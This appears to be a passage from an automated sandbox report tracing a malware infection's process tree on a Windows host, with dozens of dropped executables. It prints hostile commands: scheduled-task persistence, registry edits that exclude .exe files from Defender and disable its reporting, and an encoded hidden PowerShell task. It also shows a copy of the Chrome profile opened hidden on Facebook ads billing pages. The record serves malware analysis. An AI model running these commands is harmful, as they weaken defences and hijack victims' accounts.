- Suspicious use of WriteProcessMemory
PID:1936

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
5⤵
- Creates scheduled task(s)
PID:1980

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
5⤵
- Executes dropped EXE
PID:1652

C:\Users\Admin\AppData\Local\Temp\Updbdate.exe
"C:\Users\Admin\AppData\Local\Temp\Updbdate.exe"
2⤵
- Executes dropped EXE
PID:3556

C:\Users\Admin\AppData\Local\Temp\Install.exe
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
2⤵
- Executes dropped EXE
- Drops Chrome extension
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4048

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:3904

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1172

C:\Windows\SysWOW64\xcopy.exe
xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y
3⤵
- Enumerates system info in registry
PID:2900

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
3⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3568

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffe031f4f50,0x7ffe031f4f60,0x7ffe031f4f70
4⤵
PID:636

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1652,4661704903121713112,15987782354771657538,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1680 /prefetch:2
4⤵
PID:972

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1652,4661704903121713112,15987782354771657538,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2016 /prefetch:8
4⤵
PID:4584

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1652,4661704903121713112,15987782354771657538,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2288 /prefetch:8
4⤵
PID:4272

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,4661704903121713112,15987782354771657538,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3044 /prefetch:1
4⤵
PID:2136

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,4661704903121713112,15987782354771657538,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3052 /prefetch:1
4⤵
PID:5088

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,4661704903121713112,15987782354771657538,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1
4⤵
PID:3020

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,4661704903121713112,15987782354771657538,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3408 /prefetch:1
4⤵
PID:3048

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,4661704903121713112,15987782354771657538,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3812 /prefetch:1
4⤵
PID:3476

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,4661704903121713112,15987782354771657538,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4032 /prefetch:1
4⤵
PID:1280

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,4661704903121713112,15987782354771657538,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=4984 /prefetch:8
4⤵
PID:4756

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,4661704903121713112,15987782354771657538,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5124 /prefetch:1
4⤵
PID:4436

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1652,4661704903121713112,15987782354771657538,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=5656 /prefetch:8
4⤵
PID:2664

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1652,4661704903121713112,15987782354771657538,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=4972 /prefetch:8
4⤵
PID:2656

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,4661704903121713112,15987782354771657538,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=5796 /prefetch:8
4⤵
PID:4944

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1652,4661704903121713112,15987782354771657538,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=6068 /prefetch:8
4⤵
PID:2376

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,4661704903121713112,15987782354771657538,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=5668 /prefetch:8
4⤵
PID:5128

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1652,4661704903121713112,15987782354771657538,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=5916 /prefetch:8
4⤵
PID:5160

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,4661704903121713112,15987782354771657538,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6088 /prefetch:1
4⤵
PID:5228

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1652,4661704903121713112,15987782354771657538,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=6092 /prefetch:8
4⤵
PID:5728

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,4661704903121713112,15987782354771657538,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=5656 /prefetch:8
4⤵
PID:5960

C:\Users\Admin\AppData\Local\Temp\File.exe
"C:\Users\Admin\AppData\Local\Temp\File.exe"
2⤵
- Executes dropped EXE
PID:4428

C:\Users\Admin\Pictures\Adobe Films\pWfAvzPqqzzRyPXCDJWsPz6h.exe
"C:\Users\Admin\Pictures\Adobe Films\pWfAvzPqqzzRyPXCDJWsPz6h.exe"
3⤵
- Executes dropped EXE
PID:1656

C:\Users\Admin\Pictures\Adobe Films\rjYpat8tulwF7YnjvoaSvKXU.exe
"C:\Users\Admin\Pictures\Adobe Films\rjYpat8tulwF7YnjvoaSvKXU.exe"
3⤵
PID:5380

C:\Users\Admin\Documents\Y3TtAxl4rS1WqtDbMeAuMZA6.exe
"C:\Users\Admin\Documents\Y3TtAxl4rS1WqtDbMeAuMZA6.exe"
4⤵
PID:4416

C:\Users\Admin\Pictures\Adobe Films\LAvvRK80YcSzBc9lWu2TrMd6.exe
"C:\Users\Admin\Pictures\Adobe Films\LAvvRK80YcSzBc9lWu2TrMd6.exe"
5⤵
PID:5900

C:\Users\Admin\Pictures\Adobe Films\KgAKNs13fwT1_6y0GKxmK1TJ.exe
"C:\Users\Admin\Pictures\Adobe Films\KgAKNs13fwT1_6y0GKxmK1TJ.exe"
5⤵
PID:5640

C:\Users\Admin\Pictures\Adobe Films\o1zfpwBtJ2h1NFGVX_oFrSnd.exe
"C:\Users\Admin\Pictures\Adobe Films\o1zfpwBtJ2h1NFGVX_oFrSnd.exe"
5⤵
PID:3988

C:\Windows\SysWOW64\ftp.exe
ftp -?
6⤵
PID:6028

C:\Users\Admin\Pictures\Adobe Films\zGffzTTY1KS7V1yu1vf1ntpX.exe
"C:\Users\Admin\Pictures\Adobe Films\zGffzTTY1KS7V1yu1vf1ntpX.exe"
5⤵
PID:2076

C:\Users\Admin\AppData\Local\Temp\7zS54D2.tmp\Install.exe
.\Install.exe
6⤵
PID:5976

C:\Users\Admin\AppData\Local\Temp\7zS6099.tmp\Install.exe
.\Install.exe /S /site_id "525403"
7⤵
PID:220

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
8⤵
PID:6580

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
9⤵
PID:6780

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
10⤵
PID:6840

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
10⤵
PID:7036

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
8⤵
PID:6720

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
9⤵
PID:6884

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
10⤵
PID:7008

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
10⤵
PID:7056

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gyIzNkbkI" /SC once /ST 00:32:05 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
8⤵
- Creates scheduled task(s)
PID:6200

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gyIzNkbkI"
8⤵
PID:5544

C:\Users\Admin\Pictures\Adobe Films\7xEruuE7r1W8VWkrAP7_FyU7.exe
"C:\Users\Admin\Pictures\Adobe Films\7xEruuE7r1W8VWkrAP7_FyU7.exe"
5⤵
PID:5700

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5700 -s 456
6⤵
- Program crash
PID:6448

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5700 -s 764
6⤵
- Program crash
PID:6936

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5700 -s 772
6⤵
- Program crash
PID:7124

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5700 -s 824
6⤵
- Program crash
PID:6088

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5700 -s 868
6⤵
- Program crash
PID:5880

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5700 -s 984
6⤵
- Program crash
PID:6136

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5700 -s 1016
6⤵
- Program crash
PID:1156

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5700 -s 1364
6⤵
- Program crash
PID:6388

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "7xEruuE7r1W8VWkrAP7_FyU7.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\7xEruuE7r1W8VWkrAP7_FyU7.exe" & exit
6⤵
PID:4444

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "7xEruuE7r1W8VWkrAP7_FyU7.exe" /f
7⤵
- Kills process with taskkill
PID:2148

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5700 -s 492
6⤵
- Program crash
PID:6404

C:\Users\Admin\Pictures\Adobe Films\KisjgEUhwTBar464cJUP2BtN.exe
"C:\Users\Admin\Pictures\Adobe Films\KisjgEUhwTBar464cJUP2BtN.exe"
5⤵
PID:4672

C:\Users\Admin\Pictures\Adobe Films\KisjgEUhwTBar464cJUP2BtN.exe
"C:\Users\Admin\Pictures\Adobe Films\KisjgEUhwTBar464cJUP2BtN.exe" -h
6⤵
PID:5760

C:\Users\Admin\Pictures\Adobe Films\7PvInyfNrKr7HIEDKhjpn5y6.exe
"C:\Users\Admin\Pictures\Adobe Films\7PvInyfNrKr7HIEDKhjpn5y6.exe"
5⤵
PID:5360

C:\Windows\SysWOW64\regsvr32.exe
"C:\Windows\System32\regsvr32.exe" H0G7R.BER /U -s
6⤵
PID:4860

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
4⤵
- Creates scheduled task(s)
PID:3884

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
4⤵
- Creates scheduled task(s)
PID:5236

C:\Users\Admin\Pictures\Adobe Films\KF_YrLxMIl2yskOzeDYCuihP.exe
"C:\Users\Admin\Pictures\Adobe Films\KF_YrLxMIl2yskOzeDYCuihP.exe"
3⤵
PID:5420

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5420 -s 2120
4⤵
- Program crash
PID:2152

C:\Users\Admin\Pictures\Adobe Films\BGP70W9m4u1IsIIMPTVbaXMz.exe
"C:\Users\Admin\Pictures\Adobe Films\BGP70W9m4u1IsIIMPTVbaXMz.exe"
3⤵
PID:5436

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5436 -s 1732
4⤵
- Program crash
PID:4508

C:\Users\Admin\Pictures\Adobe Films\MeMKCwWrzBDvl3bvvutdypdj.exe
"C:\Users\Admin\Pictures\Adobe Films\MeMKCwWrzBDvl3bvvutdypdj.exe"
3⤵
PID:5468

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
4⤵
PID:5264

C:\Users\Admin\AppData\Local\Temp\Seka.exe
"C:\Users\Admin\AppData\Local\Temp\Seka.exe"
5⤵
PID:6612

C:\Users\Admin\Pictures\Adobe Films\Mn6D11bU9m9vzfHO9yoMWF0y.exe
"C:\Users\Admin\Pictures\Adobe Films\Mn6D11bU9m9vzfHO9yoMWF0y.exe"
3⤵
PID:5664

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
4⤵
PID:5280

C:\Users\Admin\AppData\Local\Temp\fl.exe
"C:\Users\Admin\AppData\Local\Temp\fl.exe"
5⤵
PID:6812

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
6⤵
PID:6956

C:\Users\Admin\Pictures\Adobe Films\HDsEq9wVTutgTlG9ma19xxrK.exe
"C:\Users\Admin\Pictures\Adobe Films\HDsEq9wVTutgTlG9ma19xxrK.exe"
3⤵
PID:5648

C:\Users\Admin\Pictures\Adobe Films\HDsEq9wVTutgTlG9ma19xxrK.exe
"C:\Users\Admin\Pictures\Adobe Films\HDsEq9wVTutgTlG9ma19xxrK.exe"
4⤵
PID:2052

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\ed4166b3-889f-44a3-a957-cce9e7400fa6" /deny *S-1-1-0:(OI)(CI)(DE,DC)
5⤵
- Modifies file permissions
PID:5396

C:\Users\Admin\Pictures\Adobe Films\HDsEq9wVTutgTlG9ma19xxrK.exe
"C:\Users\Admin\Pictures\Adobe Films\HDsEq9wVTutgTlG9ma19xxrK.exe" --Admin IsNotAutoStart IsNotTask
5⤵
PID:6428

C:\Users\Admin\Pictures\Adobe Films\HDsEq9wVTutgTlG9ma19xxrK.exe
"C:\Users\Admin\Pictures\Adobe Films\HDsEq9wVTutgTlG9ma19xxrK.exe" --Admin IsNotAutoStart IsNotTask
6⤵
PID:5548

C:\Users\Admin\AppData\Local\ebd527a2-7239-48bb-8bbf-41bbfa6b6407\build2.exe
"C:\Users\Admin\AppData\Local\ebd527a2-7239-48bb-8bbf-41bbfa6b6407\build2.exe"
7⤵
PID:3976

C:\Users\Admin\AppData\Local\ebd527a2-7239-48bb-8bbf-41bbfa6b6407\build2.exe
"C:\Users\Admin\AppData\Local\ebd527a2-7239-48bb-8bbf-41bbfa6b6407\build2.exe"
8⤵
PID:7060

C:\Users\Admin\Pictures\Adobe Films\G20YPsVGsTNCxiLhNL9weGaG.exe
"C:\Users\Admin\Pictures\Adobe Films\G20YPsVGsTNCxiLhNL9weGaG.exe"
3⤵
PID:5612

C:\Windows\SysWOW64\ftp.exe
ftp -?
4⤵
PID:4468

C:\Users\Admin\Pictures\Adobe Films\Tl1cbYkgdtQXODwKWSSSpZFM.exe
"C:\Users\Admin\Pictures\Adobe Films\Tl1cbYkgdtQXODwKWSSSpZFM.exe"
3⤵
PID:5596

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5596 -s 1304
4⤵
- Program crash
PID:6472

C:\Users\Admin\Pictures\Adobe Films\pGq9SWoRTSeHv7f1G4GbOBXa.exe
"C:\Users\Admin\Pictures\Adobe Films\pGq9SWoRTSeHv7f1G4GbOBXa.exe"
3⤵
PID:5584

C:\Users\Admin\Pictures\Adobe Films\OGHbmTMNyxztrKLpvBkZbqno.exe
"C:\Users\Admin\Pictures\Adobe Films\OGHbmTMNyxztrKLpvBkZbqno.exe"
3⤵
PID:5568

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
4⤵
PID:5312

C:\Users\Admin\AppData\Local\Temp\svclip.exe
"C:\Users\Admin\AppData\Local\Temp\svclip.exe"
5⤵
PID:6292

C:\Users\Admin\Pictures\Adobe Films\3Vsi0M1NBI0k9VWi599OOwa3.exe
"C:\Users\Admin\Pictures\Adobe Films\3Vsi0M1NBI0k9VWi599OOwa3.exe"
3⤵
PID:5548

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im 3Vsi0M1NBI0k9VWi599OOwa3.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\3Vsi0M1NBI0k9VWi599OOwa3.exe" & del C:\ProgramData\*.dll & exit
4⤵
PID:4548

C:\Windows\SysWOW64\taskkill.exe
taskkill /im 3Vsi0M1NBI0k9VWi599OOwa3.exe /f
5⤵
- Kills process with taskkill
PID:6404

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
5⤵
- Delays execution with timeout.exe
PID:6872

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5548 -s 1800
4⤵
- Program crash
PID:5608

C:\Users\Admin\Pictures\Adobe Films\Tma5KgC5rYX9V2VIjwmZgDeX.exe
"C:\Users\Admin\Pictures\Adobe Films\Tma5KgC5rYX9V2VIjwmZgDeX.exe"
3⤵
PID:5620

C:\Users\Admin\Pictures\Adobe Films\XCNsyPUTYCz30uLWgBBkOfOK.exe
"C:\Users\Admin\Pictures\Adobe Films\XCNsyPUTYCz30uLWgBBkOfOK.exe"
3⤵
PID:5604

C:\Users\Admin\Pictures\Adobe Films\nha6SJar6FcaJ_k8UCWJRmFz.exe
"C:\Users\Admin\Pictures\Adobe Films\nha6SJar6FcaJ_k8UCWJRmFz.exe"
3⤵
PID:5576

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
4⤵
PID:4756

C:\Users\Admin\Pictures\Adobe Films\hBHNrwtvODghhyaR8pqSvOfo.exe
"C:\Users\Admin\Pictures\Adobe Films\hBHNrwtvODghhyaR8pqSvOfo.exe"
3⤵
PID:5544

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
4⤵
PID:4708

C:\Users\Admin\Pictures\Adobe Films\Y0H2ghxo26_cTQ1I22UKK6Y9.exe
"C:\Users\Admin\Pictures\Adobe Films\Y0H2ghxo26_cTQ1I22UKK6Y9.exe"
3⤵
PID:5560

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5560 -s 456
4⤵
- Program crash
PID:5920

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5560 -s 772
4⤵
- Program crash
PID:5660

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5560 -s 780
4⤵
- Program crash
PID:4048

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5560 -s 780
4⤵
- Program crash
PID:5844

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5560 -s 632
4⤵
- Program crash
PID:2804

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5560 -s 780
4⤵
- Program crash
PID:6212

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5560 -s 796
4⤵
- Program crash
PID:6692

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5560 -s 1360
4⤵
- Program crash
PID:6164

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "Y0H2ghxo26_cTQ1I22UKK6Y9.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\Y0H2ghxo26_cTQ1I22UKK6Y9.exe" & exit
4⤵
PID:3180

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "Y0H2ghxo26_cTQ1I22UKK6Y9.exe" /f
5⤵
- Kills process with taskkill
PID:5744

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5560 -s 1388
4⤵
- Program crash
PID:3776

C:\Users\Admin\Pictures\Adobe Films\vOs56hwzYWQWI_3fHMlGokP6.exe
"C:\Users\Admin\Pictures\Adobe Films\vOs56hwzYWQWI_3fHMlGokP6.exe"
3⤵
PID:5756

C:\Users\Admin\AppData\Local\Temp\8c7aecc852\orxds.exe
"C:\Users\Admin\AppData\Local\Temp\8c7aecc852\orxds.exe"
4⤵
PID:5392

C:\Windows\SysWOW64\cmd.exe
